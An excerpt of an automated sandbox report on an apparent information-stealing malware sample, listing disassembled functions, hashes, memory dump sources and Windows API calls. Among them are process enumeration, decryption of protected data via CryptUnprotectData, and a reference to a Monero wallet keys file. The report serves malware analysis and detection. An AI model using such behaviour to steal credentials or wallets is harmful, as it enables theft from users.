                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: o9=i$r;2$V>}$zz
                              • API String ID: 0-2812664298
                              • Opcode ID: 8b5b1542db119f3e2af282f65658eb9a0c1218b1f04e24e2eab4cf78195b0064
                              • Instruction ID: 5468f544d2aa088cc74e3ee8bd9dbab6df52a7544688b245e3fd7a0ebc5712f6
                              • Opcode Fuzzy Hash: 8b5b1542db119f3e2af282f65658eb9a0c1218b1f04e24e2eab4cf78195b0064
                              • Instruction Fuzzy Hash: CCB229F3A082109FE304AE2DEC8567AFBE9EFD4760F1A493DEAC4D3744E53558058692
                              Function 00C69E83 Relevance: 6.6, Strings: 4, Instructions: 1616COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4S$R=o$no$c~I
                              • API String ID: 0-3146338768
                              • Opcode ID: 590080724121bd8d80f1b8fe9b9813cd96aa6b337059589dbc0dc00b5041ea8c
                              • Instruction ID: 02fc52a287ed166fbdf3148808254824f6b69035a2ee33c9264dc0592f5f37c6
                              • Opcode Fuzzy Hash: 590080724121bd8d80f1b8fe9b9813cd96aa6b337059589dbc0dc00b5041ea8c
                              • Instruction Fuzzy Hash: 87B216F360C2009FE3046E2DEC8567ABBE9EF94720F1A4A3DE6C4C7744EA7558058697
                              Function 00C7AF40 Relevance: 6.6, Strings: 4, Instructions: 1601COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !O?v$-"|r$67#$y_
                              • API String ID: 0-10929917
                              • Opcode ID: 90b57728151a8181ef2994063fb98c627be925b8f74942ed80ca1a88de77f530
                              • Instruction ID: f0a66f84d619af8be84c4a7a7f4429fcababca092bedc2926e28419b0556caa7
                              • Opcode Fuzzy Hash: 90b57728151a8181ef2994063fb98c627be925b8f74942ed80ca1a88de77f530
                              • Instruction Fuzzy Hash: 0CB2E6F3A0C214AFE7046E29EC8566BFBE5EF94720F16493DE6C4C3704E63598058697
                              Function 008B8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008C05B7), ref: 008B86CA
                              • Process32First.KERNEL32(?,00000128), ref: 008B86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 008B86F3
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • CloseHandle.KERNEL32(?), ref: 008B8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: a23ae453fb4d1534f6cd085c4eab6d7fd15131e58926f9134745c2b7dc8a159e
                              • Instruction ID: e98e711a0839df43980420e4c07834c0bcbfcd6eec28ac6efc6647519386b36f
                              • Opcode Fuzzy Hash: a23ae453fb4d1534f6cd085c4eab6d7fd15131e58926f9134745c2b7dc8a159e
                              • Instruction Fuzzy Hash: 8D314D71901218EBCB28DF94CC95FEEB778FB55700F1041A9E50AE62A0DF346A45CFA2
                              Function 008B8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,008A5184,40000001,00000000,00000000,?,008A5184), ref: 008B8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: e9f406faf474bb6962a502096d7f239115340e858db5cfa46b7c1b40937c9722
                              • Instruction ID: 5406991bc20d543c3865aca30c10182e944afa079e446539cd285b279b84af98
                              • Opcode Fuzzy Hash: e9f406faf474bb6962a502096d7f239115340e858db5cfa46b7c1b40937c9722
                              • Instruction Fuzzy Hash: 3E11B074200209EBDB00DFA4E885FAA37A9FF89714F109558F919CB350DB75E942DB61
                              Function 008A9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
                              • LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 510967276e15e15ddcd72b6179079d6f21a2d57d71a045ea055268ae85b75cc8
                              • Instruction ID: a8b58a435dc5fd7c5de5b2540089dd22846107e770a28c364c8caa25f438d212
                              • Opcode Fuzzy Hash: 510967276e15e15ddcd72b6179079d6f21a2d57d71a045ea055268ae85b75cc8
                              • Instruction Fuzzy Hash: 441174B4641208EFEB10CFA4DC95FAA77B5FB89714F208158F9159F390C775A942CB60
                              Function 008B7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E00,00000000,?), ref: 008B79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,008C0E00,00000000,?), ref: 008B79C4
                              • wsprintfA.USER32 ref: 008B79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 2c5d0fe965bcef07770d088eed20f0c87d4f53f0d49e13c724c4b5fc5a1a7341
                              • Instruction ID: 8d9f94cb033da58ae78c9c4b9409fd71142079350446f111856989ad1845dd75
                              • Opcode Fuzzy Hash: 2c5d0fe965bcef07770d088eed20f0c87d4f53f0d49e13c724c4b5fc5a1a7341
                              • Instruction Fuzzy Hash: FC112AB2904158ABCB14DFC9DD85BBEB7F8FB4CB11F10411AF605A2280E2395941C7B1
                              Function 008B7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0142E848,00000000,?,008C0E10,00000000,?,00000000,00000000), ref: 008B7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0142E848,00000000,?,008C0E10,00000000,?,00000000,00000000,?), ref: 008B7A7D
                              • wsprintfA.USER32 ref: 008B7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 79bfc45cc620d2a703e47e405a6725203058de873d3cf683861ba7509dcfd33c
                              • Instruction ID: df3334470b3139f44073c2a73c150475af62f7e4f2b0b1e8db5ff299bdcb1074
                              • Opcode Fuzzy Hash: 79bfc45cc620d2a703e47e405a6725203058de873d3cf683861ba7509dcfd33c
                              • Instruction Fuzzy Hash: 95117CB1945228EBEB20CF54DC49FA9BB78FB44721F10429AE91A972C0D7746A40CF51
                              Function 00C79EC3 Relevance: 5.8, Strings: 4, Instructions: 781COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /oo$?(P$br_{$rz3^
                              • API String ID: 0-4284516167
                              • Opcode ID: 6ea21941cb32fcc9a4450d078b5095dfc7032658a14185baa19f52b2fb4dd88f
                              • Instruction ID: a77feff0b3e0261e6fc8c02a1ab93fe2391d6d83c4ef0fc407c7dfa750877ab4
                              • Opcode Fuzzy Hash: 6ea21941cb32fcc9a4450d078b5095dfc7032658a14185baa19f52b2fb4dd88f
                              • Instruction Fuzzy Hash: B342D3F260C2009FE304AE2DEC8567AFBE5EF94720F1A893DE6C5C3744E67498058657
                              Function 00C77F64 Relevance: 4.9, Strings: 3, Instructions: 1166COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?mR$?mR$me=W
                              • API String ID: 0-3641299783
                              • Opcode ID: c8edb79a2895967f1e0e8ecddfa0050e2a7a4e457620b9376077cb04543a58b7
                              • Instruction ID: 994ff6037a690e89d504ca9fe61ef76e32c5a30fb8b7ba3310e5daddb6fc37f7
                              • Opcode Fuzzy Hash: c8edb79a2895967f1e0e8ecddfa0050e2a7a4e457620b9376077cb04543a58b7
                              • Instruction Fuzzy Hash: F2723AF3A082009FE304AE2DEC8567AFBE6EFD4720F1A853DE6C5C7744E53598058696
                              Function 008B3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(008BE118,00000000,00000001,008BE108,00000000), ref: 008B3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008B37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 8dcddd3b9c769af43ded193e085ce7127d77e5fdc72976566acb405198b2e2f5
                              • Instruction ID: 069aa6e751e635e0aba69efd2e4e5b37c2e4d80f17278e7cdc34f7537e27a62f
                              • Opcode Fuzzy Hash: 8dcddd3b9c769af43ded193e085ce7127d77e5fdc72976566acb405198b2e2f5
                              • Instruction Fuzzy Hash: B941F670A40A289FDB24DB58CC94BDBB7B5FB48702F4051D8E618EB290E771AE85CF51
                              Function 008A9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 008A9BA3
                              • LocalFree.KERNEL32(?), ref: 008A9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
